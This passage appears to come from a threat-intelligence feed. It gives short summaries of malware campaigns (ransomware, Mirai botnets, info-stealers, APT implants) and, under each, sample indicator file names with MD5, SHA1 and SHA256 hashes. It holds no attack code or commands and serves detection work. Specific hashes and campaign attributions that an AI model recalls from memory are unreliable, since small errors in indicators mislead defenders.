SHA1: 042ce9ab1afe035e0924753f076fcb20de0d1a1d
SHA256: 7d68da8aa78929bb467682ddb080e750ed07cd21b1ee7a9f38cf2810eeb9cb95
9144a60ac86d4c91f7553768d9bef848acd3bd9fe3e599b7ea2024a8a3115669_browsingXxX71Exe·exe
MD5: a57f84e3848ab36fd59c94d32284a41e
SHA1: 4d5992de4601c4306885c71b0ba197184bb69221
SHA256: 9144a60ac86d4c91f7553768d9bef848acd3bd9fe3e599b7ea2024a8a3115669
736de79e0a2d08156bae608b2a3e63336829d59d38d61907642149a566ebd270_browsingXxX69Exe·exe
MD5: 47386ee20a6a94830ee4fa38b419a6f7
SHA1: ee4575cf9818636781677d63236d3dc65652deab
SHA256: 736de79e0a2d08156bae608b2a3e63336829d59d38d61907642149a566ebd270
CERT-IL Alert – DJVU Ransomware
CERT-IL issued a warning about the increased use of DJVU ransomware against targets in Israel.
Sample IoCs
83546201db335f52721ed313b9078de267eaf1c5d58168b99e35b2836bf4f0fc_browsingXxX2Exe·exe
MD5: b8dc3028562df4c7d77306ab31778bd6
SHA1: dc0b2aa06d1c5e472060fd0eea07c89d093b9abc
SHA256: 83546201db335f52721ed313b9078de267eaf1c5d58168b99e35b2836bf4f0fc
8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0_browsingXxX4Exe·exe
MD5: 9ead10c08e72ae41921191f8db39bc16
SHA1: abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256: 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
3d9cf227ef3c29b9ca22c66359fdd61d9b3d3f2bb197ec3df42d49ff22b989a4_browsingXxX3Exe·exe
MD5: 37b6aab56a0f770ce58a670322361a1c
SHA1: 87606604cdaa89b93d4d1b5e3e12f5ec24f60016
SHA256: 3d9cf227ef3c29b9ca22c66359fdd61d9b3d3f2bb197ec3df42d49ff22b989a4
Mirai Zombie Network Variant Aquabot Analysis
Recently, Antiy CERT captured a new variant of the Mirai botnet targeting various architectures such as MIPS, ARM and x86. It infects targets using weak passwords and waits for control commands to execute DDoS attacks.
Sample IoCs
8f9ba77dd02762aa6b95c65716c759d300f492d1fa572739750e50a78658c968_browsingXxX14Elf·elf
MD5: 14c46c7f8f8185793bef4f919c24dc05
SHA1: d73f64ec3e69252a3f91b48dc8729af5d92ef4f8
SHA256: 8f9ba77dd02762aa6b95c65716c759d300f492d1fa572739750e50a78658c968
14089ffd01f6b565f66bfe9e9a708e4376865c6c4407a1f4d16d50198a0bb8e3_browsingXxX11Elf·elf
MD5: a06b5be74af6d4a8bb534dce0e4d8960
SHA1: 1db201f4c491d0cb90fe95cb3e1dfa8e0975cfbd
SHA256: 14089ffd01f6b565f66bfe9e9a708e4376865c6c4407a1f4d16d50198a0bb8e3
6d6db580b0f7853421c7523f7a2f4696d98f9251d950466e9c070e51817f48f7_browsingXxX24Elf·elf
MD5: 8ffd26c19f4890863d0f969d04f38f5b
SHA1: 781c5af0c941aafd324a94ad2fe7dee62baffb46
SHA256: 6d6db580b0f7853421c7523f7a2f4696d98f9251d950466e9c070e51817f48f7
New RE#TURGENCE Attack Campaign: Turkish Hackers Target MSSQL Servers To Deliver Domain-Wide Mimic Ransomware
The Securonix Threat Research team has been monitoring an ongoing threat campaign, RE#TURGENCE, which involves the targeting and exploitation of MSSQL database servers to gain initial access. The threat actors appear to be targeting the US, EU and LATAM countries and are financially motivated.
Sample IoCs
d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb_browsingXxX1Exe·exe
MD5: 6a58b52b184715583cda792b56a0a1ed
SHA1: 3477a173e2c1005a81d042802ab0f22cc12a4d55
SHA256: d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb
1c7b82b084da8b57ffeef7bdca955c2aa4a209a96ec70e8d13e67283c10c12a5_browsingXxX3Exe·exe
MD5: 19b33fe99bcd5040034e96bec2023e0d
SHA1: 64a01d3d666ec101e059174905837e0bde9e98e3
SHA256: 1c7b82b084da8b57ffeef7bdca955c2aa4a209a96ec70e8d13e67283c10c12a5
31feff32d23728b39ed813c1e7dc5fe6a87dcd4d10aa995446a8c5eb5da58615_browsingXxX5Exe·exe
MD5: 57850a4490a6afd1ef682eb93ea45e65
SHA1: 338d147711c56e8a1e75e64a075e5e2984aa0c05
SHA256: 31feff32d23728b39ed813c1e7dc5fe6a87dcd4d10aa995446a8c5eb5da58615
Atomic Stealer rings in the new year with updated version
Atomic Stealer appears to have been updated around mid-to-late December 2023, when its developers introduced payload encryption in an effort to bypass detection rules. Some samples from crack websites made their way to VirusTotal around that time frame, followed by a malvertising campaign observed in January 2024.
Sample IoCs
18bc97e3f68864845c719754d2d667bb03f754f6e87428e33f9c763a8e6a704a_browsingXxX1Dmg·dmg
MD5: 8a2f7bacd04659f0d838e5b6c892b962
SHA1: e40275b896afac76171183d27b52913c541013a6
SHA256: 18bc97e3f68864845c719754d2d667bb03f754f6e87428e33f9c763a8e6a704a
18bc97e3f68864845c719754d2d667bb03f754f6e87428e33f9c763a8e6a704a_edrXxX1Dmg·dmg
MD5: 8a2f7bacd04659f0d838e5b6c892b962
SHA1: e40275b896afac76171183d27b52913c541013a6
SHA256: 18bc97e3f68864845c719754d2d667bb03f754f6e87428e33f9c763a8e6a704a
Threat Actors Target Lucrative Information By Distributing Lumma Stealer Via Compromised YouTube Accounts
The threat actor uses YouTube to spread a Lumma Stealer variant, luring potential victims with deceptive ads for cracked software. They employ URL-shortening services such as TinyURL and Cuttly to deceive victims into clicking the malicious URL. The victim downloads a ZIP file containing a malicious LNK file, which downloads a .NET loader that in turn drops the final payload; the payload targets sensitive information such as user credentials, system details, browser data and extensions. Additionally, the malware employs anti-VM and anti-debugging functions to evade detection.
Sample IoCs
01a23f8f59455eb97f55086c21be934e6e5db07e64acb6e63c8d358b763dab4f_browsingXxX215Exe·exe
MD5: 6d07e04a6926d1dd6cc7805f866114a4
SHA1: 55dd745220a09fe110ed6f92fc883b566ba7f47a
SHA256: 01a23f8f59455eb97f55086c21be934e6e5db07e64acb6e63c8d358b763dab4f
483672a00ea676236ea423c91d576542dc572be864a4162df031faf35897a532_browsingXxX217Lnk·lnk
MD5: 757661287c20b63b1c6ae4f66fc0c6d8
SHA1: c22bbfca22798c9505e311bc1fcc417b8f7ae272
SHA256: 483672a00ea676236ea423c91d576542dc572be864a4162df031faf35897a532
01a23f8f59455eb97f55086c21be934e6e5db07e64acb6e63c8d358b763dab4f_edrXxX215Exe·exe
MD5: 6d07e04a6926d1dd6cc7805f866114a4
SHA1: 55dd745220a09fe110ed6f92fc883b566ba7f47a
SHA256: 01a23f8f59455eb97f55086c21be934e6e5db07e64acb6e63c8d358b763dab4f
Raspberry Robin – Global USB Malware Campaign
This USB malware is not the usual self-copying VBS low-grade stuff; it is more like the BadUSB campaigns from a few years ago that were reportedly linked to FIN7 and led to BlackMatter or REvil ransomware. Microsoft's report on Raspberry Robin was the first to reveal that Raspberry Robin also leads to multiple other top-tier malware loaders such as SocGholish, IcedID, Bumblebee and Truebot, which are all well-known ransomware precursor families. Raspberry Robin has shown itself to be an emerging player in the big-game-hunting ransomware ecosystem. USB malware has proven to be an old yet still effective method to establish an initial foothold inside target environments.
Sample IoCs
8cc69700d007da11ee29a37d9accd87be1e9b16c49e8d8015b4cc237de803e24_browsingXxX1Lnk·lnk
MD5: 1dc4a96b34323ee26830091029ad3552
SHA1: 864d75f8ea0a369a58b478db3dd03927cd983078
SHA256: 8cc69700d007da11ee29a37d9accd87be1e9b16c49e8d8015b4cc237de803e24
de62ea5d304259d153101e488449afb51f536a2c65082f929d298939de129355_browsingXxX2Txt·txt
MD5: 52e5b7116f7d77be75888ad91395479d
SHA1: 003b4bcacccadff7b68831c4991c3c04d630dc59
SHA256: de62ea5d304259d153101e488449afb51f536a2c65082f929d298939de129355
1c8b93c05c58886a9edbf2818a2cc6bcc06f003b8919f76f7c0af6a9602bea35_browsingXxX3Unkn·unkn
MD5: db93f64e469fa0a65000ec9eee3a9e18
SHA1: efb8e9e1ff37693cfbe6549fe9092a93ac7704a2
SHA256: 1c8b93c05c58886a9edbf2818a2cc6bcc06f003b8919f76f7c0af6a9602bea35
Kaspersky Crimeware Report: FakeSG, Akira and AMOS
Kaspersky has published a crimeware report covering the FakeSG malware distribution campaign, the cross-platform Akira ransomware and the AMOS stealer.
Sample IoCs
4d24b359176389301c14a92607b5c26b8490c41e7e3a2abbc87510d1376f4a87_browsingXxX89Exe·exe
MD5: c60ac6a6e6e582ab0ecb1fdbd607705b
SHA1: ba9de479beb82fd97bbdfbc04ef22e08224724ba
SHA256: 4d24b359176389301c14a92607b5c26b8490c41e7e3a2abbc87510d1376f4a87
2b28270c1675990a2c78b31faab547fb75948dd1c2b22e892377ee5e40abebc2_browsingXxX92Exe·exe
MD5: 2cda932f5a9dafb0a328d0f9788bd89c
SHA1: e27521c7158c6af3aa58f78fcbed64b17c946f70
SHA256: 2b28270c1675990a2c78b31faab547fb75948dd1c2b22e892377ee5e40abebc2
6cadab96185dbe6f3a7b95cf2f97d6ac395785607baa6ed7bf363deeb59cc360_browsingXxX93Exe·exe
MD5: 0885b3153e61caa56117770247be0444
SHA1: 941d001e2974c9762249b93496b96250211f6e0f
SHA256: 6cadab96185dbe6f3a7b95cf2f97d6ac395785607baa6ed7bf363deeb59cc360
JinxLoader Leads To Formbook/XLoader
JinxLoader is a relatively new malware-as-a-service loader first advertised on HackForums.
The malware first arrives through a phishing email as an archived attachment and leads to Formbook/XLoader C2 traffic.
Sample IoCs
9b1090ff32a441a89294739884b9a0330e75497573dde39b6b79ac4dd0a9effd_browsingXxX36Zip·zip
MD5: b64c7b16323fca44ab64b592368a6f2d
SHA1: 3ec99de18abd9dfb5081840afb04280437a3d50d
SHA256: 9b1090ff32a441a89294739884b9a0330e75497573dde39b6b79ac4dd0a9effd
b7c66440c975bed86efe68c47c95bd1460ab8cf21bccacfc1e80c145e7be0f8b_browsingXxX37Exe·exe
MD5: 46ce034ff575452d1d26c2002788f403
SHA1: 17219562838ee0d7fdf7a4883ed130757db556bb
SHA256: b7c66440c975bed86efe68c47c95bd1460ab8cf21bccacfc1e80c145e7be0f8b
c1d3ad3f518cf02925d304f1912860d01e8cfd8d2ed6f76bd200c7d25370206f_browsingXxX38Dll·dll
MD5: 23f06ef88b78cb6b011ebd36af6b4e72
SHA1: a1c2ba291bffcd95e26fc2acae1cfbf0905ddc6f
SHA256: c1d3ad3f518cf02925d304f1912860d01e8cfd8d2ed6f76bd200c7d25370206f
Fog Of Cyber Warfare: Cloud Atlas Spies Attack Russian Companies Under The Guise Of Supporting NWO Participants
Cloud Atlas is a pro-government APT group specializing in cyber espionage and theft of confidential information, and according to researchers it has been active since at least 2014. Its most frequent targets have been industrial enterprises and state-owned companies in Russia, Belarus, Azerbaijan, Turkey and Slovenia. The main attack vector is a targeted email campaign with a malicious attachment.
Sample IoCs
cfc3178b710038666a4a4c5676b5c6befea085ad0243663791ae95f65e1468de_browsingXxX1Doc·doc
MD5: 0957edfec31dd2dd05d484eed90593c7
SHA1: a03a699031e956b4fde1ced6309b67853a54602a
SHA256: cfc3178b710038666a4a4c5676b5c6befea085ad0243663791ae95f65e1468de
baccfa04bf7cf862c05bc7180532cf609df43a091febd3d85524d6689df6e405_browsingXxX4Doc·doc
MD5: 2e950fe4bd76088f89433a6f2146cb67
SHA1: 07735f3da5f5847e9df43034459e3ead4c1f3f35
SHA256: baccfa04bf7cf862c05bc7180532cf609df43a091febd3d85524d6689df6e405
e3d2e6f8740bc5a510239af41e77a3e07eaf09f1aa5cda78558035399db3f971_browsingXxX5Doc·doc
MD5: 7bdb049cb0cc3623e4fa1d8e2574f1ce
SHA1: 7329424eba132feebba57e239000331e886b1656
SHA256: e3d2e6f8740bc5a510239af41e77a3e07eaf09f1aa5cda78558035399db3f971
Three New Malicious PyPI Packages Deploy CoinMiner On Linux Devices
FortiGuard Labs has identified three new malicious PyPI packages that deploy a CoinMiner executable on Linux devices, in an analysis published on Wednesday in its Security Research Review (PSIRT) journal.
Sample IoCs
df0211bf54174b5766366eecfb0a04c4a59346478e1507b6685fbaed6b2d2aca_browsingXxX1Elf·elf
MD5: 91420762292cddfcf9e2ad552de41518
SHA1: 5ef904a0cc9bdcd49f57ac95f1d17686a78d6299
SHA256: df0211bf54174b5766366eecfb0a04c4a59346478e1507b6685fbaed6b2d2aca
df0211bf54174b5766366eecfb0a04c4a59346478e1507b6685fbaed6b2d2aca_edrXxX1Elf·elf
MD5: 91420762292cddfcf9e2ad552de41518
SHA1: 5ef904a0cc9bdcd49f57ac95f1d17686a78d6299
SHA256: df0211bf54174b5766366eecfb0a04c4a59346478e1507b6685fbaed6b2d2aca
MetaStealer Latest Version Analysis
MetaStealer is an infostealer launched in 2022 that reuses the functionality, code and panel of RedLine Stealer. In recent months several updates have taken place, including new functionality such as a Google cookies refresher, which allows it to generate new session cookies when the old ones have expired, and new obfuscation mechanisms. Apart from that, it retains the capabilities of previous versions, such as theft of system files and credentials, screen capture, and collection of cryptocurrency information.
Sample IoCs
008f9352765d1b3360726363e3e179b527a566bc59acecea06bd16eb16b66c5d_browsingXxX194Exe·exe
MD5: e6db93b513085fe253753cff76054a2a
SHA1: 33091b6f54dfcd85e0c7a7490a468c5b32174db3
SHA256: 008f9352765d1b3360726363e3e179b527a566bc59acecea06bd16eb16b66c5d
cf0becb19e10b2dcd972fbe94aea00c51b8290b052263117e7ed8721d48ee104_browsingXxX196Exe·exe
MD5: a8d6e729b4911e1a0e3e9053eab2392b
SHA1: c1730126a7673bafe780d92fcca9d88707df0ff3
SHA256: cf0becb19e10b2dcd972fbe94aea00c51b8290b052263117e7ed8721d48ee104
0308d3c70f995bb4fd979802c0a6fd91e40d4baf21858d50f1a25a0b8a0653e6_browsingXxX198Exe·exe
MD5: b3cca536bf466f360b7d38bb3c9fc9bc
SHA1: c0fa6e6a1cf0c49db74259c821e9d33a73743656
SHA256: 0308d3c70f995bb4fd979802c0a6fd91e40d4baf21858d50f1a25a0b8a0653e6
Unveiling The Mirai Insights Into Recent DShield Honeypot Activity
Mirai infiltrated numerous IoT devices through common weaknesses such as weak and default username and password combinations. Once Mirai gains access to a system, it carries out its primary function: enslaving devices and coordinating them for massive Distributed Denial of Service (DDoS) attacks.
Sample IoCs
5466d9405031060ffb564f14b5a263eda12e1_browsing79287ca4a4a7c94501cd6a25c53XxX165Elf·elf
MD5: 91c36bd124e4c8f7a2bc6b6d01324d3c
SHA1: c7ae2abe4870bb274c1420beab092edb276dde78
SHA256: 5466d9405031060ffb564f14b5a263eda12e179287ca4a4a7c94501cd6a25c53
b023af46_browsing798a045ce9606318928ed9a96bd64bc25c7279a08b5fee38176e5dc9XxX166Elf·elf
MD5: d4dfa01b9aec82a3383a522a6e74b2a5
SHA1: fb9900355f4671f79ed9a2575f2178aa9fcc77a7
SHA256: b023af46798a045ce9606318928ed9a96bd64bc25c7279a08b5fee38176e5dc9
5466d9405031060ffb564f14b5a263eda12e1_edr79287ca4a4a7c94501cd6a25c53XxX165Elf·elf
MD5: 91c36bd124e4c8f7a2bc6b6d01324d3c
SHA1: c7ae2abe4870bb274c1420beab092edb276dde78
SHA256: 5466d9405031060ffb564f14b5a263eda12e179287ca4a4a7c94501cd6a25c53
Technical Analysis Of Pure Logs Stealer
Pure Logs is an info-stealer developed by a malware developer going by the alias PureCoder; it emerged for sale in various forums around October 2022. The stealer is encrypted with Pure Crypter and consists of multiple features, including anti-VM, file deletion, a file grabber, clipboard data theft, and the stealing of lucrative information from crypto applications, email applications and web browsers.
The threat actor achieves persistence via registry run keys and, after achieving action on objectives, removes the payload using PowerShell.
Sample IoCs
8543ea15813ea1_browsing70dd0538d7cd629f451ceb7e18b07c4db1cdbce5e089b227d4XxX1Dll·dll
MD5: e137cdeda4f4b5fd1b1138f4c1982d83
SHA1: e2bce8d85343f800ca3bb92f691110fd97820169
SHA256: 8543ea15813ea170dd0538d7cd629f451ceb7e18b07c4db1cdbce5e089b227d4
2b84f504b2b8389d28f2a81_browsing79a8369fc511391e7331f852aaf3a6a2f26a79ee4XxX3Dll·dll
MD5: 84c5bbe6bc76c4ac3ce3c6bd0b67741c
SHA1: 4b4c7e5bf868f98dd717e085fd14bb9c81648288
SHA256: 2b84f504b2b8389d28f2a8179a8369fc511391e7331f852aaf3a6a2f26a79ee4
8543ea15813ea1_edr70dd0538d7cd629f451ceb7e18b07c4db1cdbce5e089b227d4XxX1Dll·dll
MD5: e137cdeda4f4b5fd1b1138f4c1982d83
SHA1: e2bce8d85343f800ca3bb92f691110fd97820169
SHA256: 8543ea15813ea170dd0538d7cd629f451ceb7e18b07c4db1cdbce5e089b227d4
Threat Actors Exploit MS-AppInstaller On Potential Victim Systems To Deploy Malware And For Monetary Gain
Financially motivated threat actors like Dev-0569, Fin7, Storm-1133 and Storm-1674 utilize the MS-Appinstaller URL scheme to deploy malicious payloads against potential victims. They exploit the MS-Appinstaller protocol handler to distribute MSIX application packages through spoofed websites and phishing attacks. Attackers leverage SEO tactics to take advantage of victims searching for legitimate software, tricking them into downloading malicious installers.
Sample IoCs
48aa2393ef590bab4ff2fd1e_browsing7d95af36e5b6911348d7674347626c9aaafa255eXxX196Exe·exe
MD5: dd131870c45342afdd00f314730481ca
SHA1: e915271b74704df25dca82a291330b14d36d4788
SHA256: 48aa2393ef590bab4ff2fd1e7d95af36e5b6911348d7674347626c9aaafa255e
b_browsing79633917e51da2a4401473d08719f493d61fd64a1b10fe482c12d984d791ccbXxX198Bat·bat
MD5: 26bd728f2394d59929f2c655c2c859be
SHA1: 79962b6ab8a597a7d20f7ec38916a13c2b6ebb36
SHA256: b79633917e51da2a4401473d08719f493d61fd64a1b10fe482c12d984d791ccb
44cac5bf0bab56b0840bd1c_browsing7b95f9c7f5078ff417705eeaaf5ea5a2167a81dd5XxX204Zip·zip
MD5: 7d27ed94ba01dc9c2761af0ed84c616f
SHA1: c2d9ecb9e0496dd21e636a77fac370325b8ae6ef
SHA256: 44cac5bf0bab56b0840bd1c7b95f9c7f5078ff417705eeaaf5ea5a2167a81dd5
A Look At The Nim-Based Campaign Using Microsoft Word Docs To Impersonate The Nepali Government – Netskope
Netskope recently analyzed a malicious backdoor written in Nim, which is a relatively new programming language. Netskope Threat Labs has observed an increase in Nim-based malware over the past year and expects Nim-based malware to become more popular as attackers continue to modify existing Nim-based samples.
Sample IoCs
b5c001cbcd_browsing72b919e9b05e3281cc4e4914fee0748b3d81954772975630233a6eXxX1Docx·docx
MD5: e2a3edc708016316477228de885f0c39
SHA1: 3aa803baf5027c57ec65eb9b47daad595ba80bac
SHA256: b5c001cbcd72b919e9b05e3281cc4e4914fee0748b3d81954772975630233a6e
b5c001cbcd_edr72b919e9b05e3281cc4e4914fee0748b3d81954772975630233a6eXxX1Docx·docx
MD5: e2a3edc708016316477228de885f0c39
SHA1: 3aa803baf5027c57ec65eb9b47daad595ba80bac
SHA256: b5c001cbcd72b919e9b05e3281cc4e4914fee0748b3d81954772975630233a6e
b5c001cbcd_mail72b919e9b05e3281cc4e4914fee0748b3d81954772975630233a6eXxX1Docx·docx
MD5: e2a3edc708016316477228de885f0c39
SHA1: 3aa803baf5027c57ec65eb9b47daad595ba80bac
SHA256: b5c001cbcd72b919e9b05e3281cc4e4914fee0748b3d81954772975630233a6e
Blackwood APT Delivers NSPX30 Implant
Researchers have analyzed a cyber attack conducted by a previously undisclosed China-aligned threat actor known as Blackwood, active since at least 2018. The attack involves a sophisticated implant, NSPX30, delivered through adversary-in-the-middle (AitM) attacks that hijack update requests from legitimate software like Tencent QQ, WPS Office and Sogou Pinyin. NSPX30 is employed in targeted attacks against Chinese and Japanese companies as well as individuals in China, Japan and the United Kingdom. The evolution of NSPX30 is traced back to a 2005 backdoor called Project Wood, designed for data collection. NSPX30 is a multistage implant with components including a dropper, installer, loaders, orchestrator and a backdoor, each with its own set of plugins. The implant facilitates packet interception, allowing operators to conceal their infrastructure, and it can whitelist itself in various Chinese antimalware solutions.
Sample IoCs
aea2_browsing77eb7cd8383479d1e502d9e3eb76f8d17c4be2dcaa63fda444cac6e96197XxX69Dll·dll
MD5: 5e45d7a7324384eb42e65586d494f7bf
SHA1: 308616371b9ff5830dffc740318fd6ba4260d032
SHA256: aea277eb7cd8383479d1e502d9e3eb76f8d17c4be2dcaa63fda444cac6e96197
fa8e6f0094e9adcad61b80c_browsing75726bf6c7624c2b10a531f9c0f8a6ffb49b950baXxX71Dll·dll
MD5: f8084ed1dc34852c32d06856784dce4d
SHA1: 240055aa125bd31bf5ba23d6c30133c5121147a5
SHA256: fa8e6f0094e9adcad61b80c75726bf6c7624c2b10a531f9c0f8a6ffb49b950ba
72b81424d6235f1_browsing7b3fc393958481e0316c63ca7ab9907914b5a737ba1ad2374XxX73Dll·dll
MD5: d8c80dc68e24a6b3c2ac31e1ef489612
SHA1: 43622b9573413e17985b3a95cbe18cfe01fadf42
SHA256: 72b81424d6235f17b3fc393958481e0316c63ca7ab9907914b5a737ba1ad2374
Trigona Ransomware Attackers Install Mimic Ransomware
A recent discovery has brought to light a concerning trend: Trigona ransomware attackers are incorporating Mimic ransomware into their repertoire. This new wave of attacks explicitly targets MS-SQL servers, leveraging the Bulk Copy Program (BCP) utility for the malware installation process. The investigation uncovered an attack in early January 2024 in which Mimic ransomware was initially deployed but was later replaced by Trigona ransomware in mid-January 2024. Notably, the attackers' email address in the Mimic ransom note differed from previous instances, while the Trigona ransom note shared an email address consistently used since early 2023. What ties these incidents together is the belief that they stem from the same Trigona attacker. The commonalities include a focus on MS-SQL servers, the use of BCP for malware installation, and identical strings and path names replicated across various attacks.
Sample IoCs
a15d1311e02cffd6_browsing7a0db25cb0d6b2ccd3fc457d0bd76d7d2a4a462bbad6356aXxX45Exe·exe
MD5: a02157550bc9b491fd03cad394ccdfe7
SHA1: 108b7428e779d5caa7854a1a4dfa5ca42f292f04
SHA256: a15d1311e02cffd67a0db25cb0d6b2ccd3fc457d0bd76d7d2a4a462bbad6356a
9ab353d50d8fb366cb898ffaba2a_browsing71b1ae772475d1ad550232d6416b15fd3b54XxX47Exe·exe
MD5: b3c8d81d6f8d19e5c07e1ca7932ed5bf
SHA1: f411ffa316df84de0e9e01c56bd4ebe3f6b2c1c9
SHA256: 9ab353d50d8fb366cb898ffaba2a71b1ae772475d1ad550232d6416b15fd3b54
85f4088286ac1eedc94ad9dc6465e9e4b89d1cde3012f9949450fcc9f2b60431_browsingXxX49Exe·exe
MD5: c28b33f7365f9dc72cc291d13458f334
SHA1: b4ad79b2800a6540f1c460ce6220a4ebb551a18b
SHA256: 85f4088286ac1eedc94ad9dc6465e9e4b89d1cde3012f9949450fcc9f2b60431
Albabat Ransomware Analysis
Albabat, also known as White Bat, is a financially motivated ransomware variant coded in Rust, initially emerging in November 2023 with version 0.1.0. Subsequent releases include version 0.3.0 in late December and version 0.3.3 in mid-January 2024. The ransomware is distributed disguised as rogue software, such as a fake Windows 10 digital activation tool or a Counter-Strike 2 cheat program. Albabat primarily targets companies and individuals in various countries, including Argentina, Brazil, the Czech Republic, Germany, Hungary, Kazakhstan, Russia and the United States. Despite this regional focus, its distribution as fake software poses a threat to users globally.
Sample IoCs
e1c399c29b93_browsing79f9d1d3f17822d4496fce8a5123f57b33f00150f287740049e9XxX1Exe·exe
MD5: 4c7d2ec42f5b225982d9e2e96383a2fd
SHA1: 6edc8db346032a83402d7104c5783cc1e929e402
SHA256: e1c399c29b9379f9d1d3f17822d4496fce8a5123f57b33f00150f287740049e9
483e0e32d3be3d2e585463aa_browsing7475c8b8ce254900bacfb9a546a5318fff024b74XxX3Exe·exe
MD5: 45d20637261dea248644a849818659a0
SHA1: 29a81b7cf0f5f4a69fe47c4ccf3d06a300899997
SHA256: 483e0e32d3be3d2e585463aa7475c8b8ce254900bacfb9a546a5318fff024b74
bfb824_browsing7e97f5fd8f9d3ee33832fe29f934a09f91266f01a5fed27a3cc96f8fbbXxX5Exe·exe
MD5: 9463a6a5b1d4f07c66a17918eb5c386e
SHA1: 7181cc5c31e98d5c3f8fa83a44b475f25c511a0f
SHA256: bfb8247e97f5fd8f9d3ee33832fe29f934a09f91266f01a5fed27a3cc96f8fbb
Spreading Zephyr Coin Miner Using AutoIT
A recent report confirms the distribution of Zephyr coin miners. The malicious file, created with AutoIT, is distributed as a compressed file named “WINDOWS_PY_M3U_EXPLOIT_2024.7z.” Unzipping it produces scripts and executable files, including an NSIS installation file and two JavaScript files. Upon execution, JavaScript files are created in the %temp% path and executed through wscript.exe.
Sample IoCs
fa4ab8fa46a5f1d9fc2aa5fa5_browsing75f2a2938aed131237ebf5a5e35df154681ee38XxX5Exe·exe
MD5: 1ea56f7d135c6d9394138b91b3b7bed2
SHA1: f6d679c8820ee658069e08dab03af68ff345af54
SHA256: fa4ab8fa46a5f1d9fc2aa5fa575f2a2938aed131237ebf5a5e35df154681ee38
15fe980582_browsing7a262de3738dad2c1f8e2dbcdf43e13e42e558e63e3a1c169cbef1XxX7Exe·exe
MD5: 2b7931a70748c38c8046dea9dc708379
SHA1: 0d7f4a14708bb6ae1e47ddeabfdc4e29c090eed9
SHA256: 15fe9805827a262de3738dad2c1f8e2dbcdf43e13e42e558e63e3a1c169cbef1
3622e1492_browsing7a90af7007ae998f647f11813f0dfb49eda36f5e8a9cab14c5961b4XxX9Exe·exe
MD5: 6647cd9d0ab63506c230fbce8019d0b8
SHA1: 04018ce1f4e0fb4c01eda19f1b28d6e96925665e
SHA256: 3622e14927a90af7007ae998f647f11813f0dfb49eda36f5e8a9cab14c5961b4
Another Phobos Ransomware Variant Launches Attack
A new variant of the Phobos ransomware has been launched by attackers using the Gitea service to store files encoded in Base64, according to FortiGuard Labs.
Sample IoCs
426284b_browsing7dedb929129687303f1bf7e4def607f404c93f7736d17241e43f0ab33XxX1Docx·docx
MD5: fe4409bf10488b02442cadeb85e000d2
SHA1: 17125f4ece6483933eb6646a16cd2859389a938a
SHA256: 426284b7dedb929129687303f1bf7e4def607f404c93f7736d17241e43f0ab33
50e2cb6004_browsing71fc38c4245d596f92f5444e7e17cd21dd794ba7d547e0f2d9a9d5XxX2Dll·dll
MD5: e8bfe9cf6c74389dbd26f496ef9a0134
SHA1: 76da039790593beeff067ef4f1da9eab9331bf4e
SHA256: 50e2cb600471fc38c4245d596f92f5444e7e17cd21dd794ba7d547e0f2d9a9d5
a0a59d83fa8631d0b9de2f4_browsing77350faa89499e96fd5ec07069e30992aaabe913aXxX3Exe·exe
MD5: 783017c5bcd0afc6e72d4b04763f584b
SHA1: 4cee55b7106c92972f534ad96b393f92c73f491e
SHA256: a0a59d83fa8631d0b9de2f477350faa89499e96fd5ec07069e30992aaabe913a
The Endless Struggle Against APT10 Insights From LODEINFO
The latest version of the LODEINFO malware was discovered in 2023, and it is believed to have been updated with new features as well as changes to its anti-analysis techniques.
Sample IoCs
7a4fd1cc932b961_browsing75055b2940242877cab728a9d7c7ee371cad8438b4e88a812XxX16Dll·dll
MD5: 2a9012499d15145b5f63700c05adc426
SHA1: 0a49317ef08ef453b3778bf550b378c96204bab4
SHA256: 7a4fd1cc932b96175055b2940242877cab728a9d7c7ee371cad8438b4e88a812
6329_browsing75a3642b0f2a6084880e59ffa19dfa8b08d13ac15b639e1e0ad3bdbf45bdXxX19Exe·exe
MD5: 60dea5b5f889f37f5a9196e040bce0eb
SHA1: e467aa61e70905b389be528441ce42de1db4cf2c
SHA256: 632975a3642b0f2a6084880e59ffa19dfa8b08d13ac15b639e1e0ad3bdbf45bd
526f48c6b3b_browsing767c119282e362eeb39238ac3593f7b3742eb08e67cd93d913a44XxX20Doc·doc
MD5: 69dd7fd355d79db0325816569ae2129a
SHA1: c08bf05db87896a15ac1913ac96bd47a35220225
SHA256: 526f48c6b3b767c119282e362eeb39238ac3593f7b3742eb08e67cd93d913a44